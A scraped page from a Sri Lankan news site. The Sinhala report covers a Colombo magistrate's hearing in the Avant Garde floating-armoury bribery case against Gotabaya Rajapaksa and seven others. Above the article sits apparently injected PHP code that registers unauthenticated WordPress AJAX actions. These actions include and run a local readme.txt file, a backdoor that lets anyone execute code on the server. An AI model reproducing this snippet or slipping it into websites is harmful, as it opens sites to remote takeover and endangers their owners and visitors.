if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ඇවන්ගාඩ් නඩුව මඟ හැලෙයිද? නියෝගය නොවැම්බර් 17 දා - mediahumanrights.lk
mediahumanrights.lk
Local News News

ඇවන්ගාඩ් නඩුව මඟ හැලෙයිද? නියෝගය නොවැම්බර් 17 දා

ඇවන්ගාඩ් සිද්ධිය සම්බන්ධයෙන් හිටපු ආරක්ෂක ලේකම් ගෝඨාභය රාජපක්ෂ මහතා ඇතුළු විත්තිකරුවන් 8 දෙනෙකුට එරෙහිව පවරා ඇති නඩුව අද (11) කොළඹ මහේස්ත්‍රාත් අධිකරණය හමුවේ විභාගයට ගැනුණි.
එම සමාගමට පාවෙන අවි ගබඩාවක් පවත්වාගෙන යාමට අනුමැතිය ලබාදිම තුළින් රජයට මූල්‍ය පාඩුවක් සිදුකළ බවට විත්තිකරුවන්ට එරෙහිව  චෝදනා  එල්ල වී තිබේ.
එහිදී නඩුව ඉදිරියටත් විභාග කිරීම සඳහා අනුමැතිය ලබාදෙන්නේ ද නැද්ද යන නියෝගය නොවැම්බර් මස 17 වනදා ප්‍රකාශයට පත්කරන බව කොළඹ අතිරේක මහේස්ත්‍රාත් බුද්ධික ශ්‍රී රාගල මහතා දැනුම් ඇත.
2010 වසරේ අගෝස්තු මස 8 වැනිදා සිට 2015 වසරේ ජනවාරි මස 8 වැනිදා දක්වා කාලය තුළ ගාලු මුහුදු තීරයේ පාවෙන අවිගබඩාවක් පවත්වාගෙන යාමට ඇවන්ගාඩ් සමාගමට අනුමැතිය ලබාදීම තුළින් රජයට රුපියල් බිලියන 11 යි දශම 4 ක පාඩුවක් සිදුකළ බවට චෝදනා කරමින් අල්ලස් කොමිසම විසින් මෙම නඩුව ගොනු කර තිබේ.

Related posts

සිනමාවේ ලැබුණු හොඳම අවස්ථාව රෂ්

Shiran Viraj

ස්ථාන මාරුවිමක් ලද පොලිස් ස්ථානාධිපතිට ප්‍රදේශවාසින්ගෙන් උපහාර…

Shiran Viraj

දිස්ත‍්‍රික්ක 08ක සියලූම පාසල් වසා දැමෙයි

Shiran Viraj